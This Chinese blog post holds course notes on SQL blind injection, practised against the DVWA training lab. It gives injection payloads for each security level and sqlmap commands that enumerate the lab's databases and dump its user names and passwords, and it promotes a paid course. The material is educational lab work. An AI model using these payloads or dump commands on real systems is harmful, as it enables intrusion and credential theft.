課程前言
白帽子黑客攻防系列課程第二季現已上線。
本課程僅做學習交流之用,切勿用於任何不法用途!
白帽子黑客攻防系列課程將會深入淺出講解計算機網絡基礎、滲透靶場搭建、Kali Linux、系統漏洞、滲透工具(Nmap、Sqlmap、AWVS等)等的原理及實戰內容。
第二季主要講解DVWA黑客攻防演練等,配合講解網絡基礎知識及Linux基礎知識等。
知其然並知其所以然,相信通過學習,各位朋友對白帽子黑客攻防會有非常深刻理解。
夢想還是要有的,萬一實現了呢!
網易雲課堂地址:https://study.163.com/course/courseMain.htm?courseId=1209505841&share=2&shareId=480000001946405
本篇博文爲SQL盲注要點筆記,主要介紹黑客攻防中的SQL盲注攻防技術。
SQL注入(盲注)概述
SQL盲注是指不能根據報錯和回顯來判斷是否存在SQL注入時,攻擊人員通過提交邏輯條件來觀察響應結果來判斷是否存在SQL注入的方式。
回顯注入與盲注在流程上沒有太多區別,都是先確定注入點,然後進行查庫、查表、查字段等工作,但是盲注並不會有直接的查詢內容顯示效果,因此在利用難度方面盲注要比回顯注入大得多。
初級原理及實操
view source
boolean 型,輸入 1' or '1' = '1
註釋型, 1' or 1=1 #
union 型,比如輸入 ' UNION ALL SELECT NULL, database()#
中級原理及實操
view source
mysql_real_escape_string會對這 5 個字符轉義:
' " \r \n NULL Control-Z
用火狐瀏覽器的查看元素,生成節點副本——編輯html文件——1 or 1=1。
高級原理及實操
view source
實操輸入1' or '1' = '1'#
盲注入侵思路(含sqlmap實操)
手動入侵思路
數據庫的名字:猜數據庫名的長度、用二分法猜數據庫的名字
所有表的名字
表字段名
猜數據
TABLES用戶創建的數據庫的庫名和表名。TABLE_SCHEMATE和TABLE_NAME
一、獲取所有的數據庫
sqlmap -u "http://192.168.199.217/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=p14aho3fltvqed96e969ufplo1; security=low" --dbs
二、獲取 dvwa 所有的表
sqlmap -u "http://192.168.199.217/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=p14aho3fltvqed96e969ufplo1; security=low" -D dvwa --tables
三、獲取users表的所有字段
sqlmap -u "http://192.168.199.217/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=p14aho3fltvqed96e969ufplo1; security=low" -D dvwa -T users --column --threads 10
四、獲取用戶及密碼信息 sqlmap -u "http://192.168.199.217/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=p14aho3fltvqed96e969ufplo1; security=low" -D dvwa -T users -C user,password --dump --threads 10
總結
神仙級原理
sqlmap實操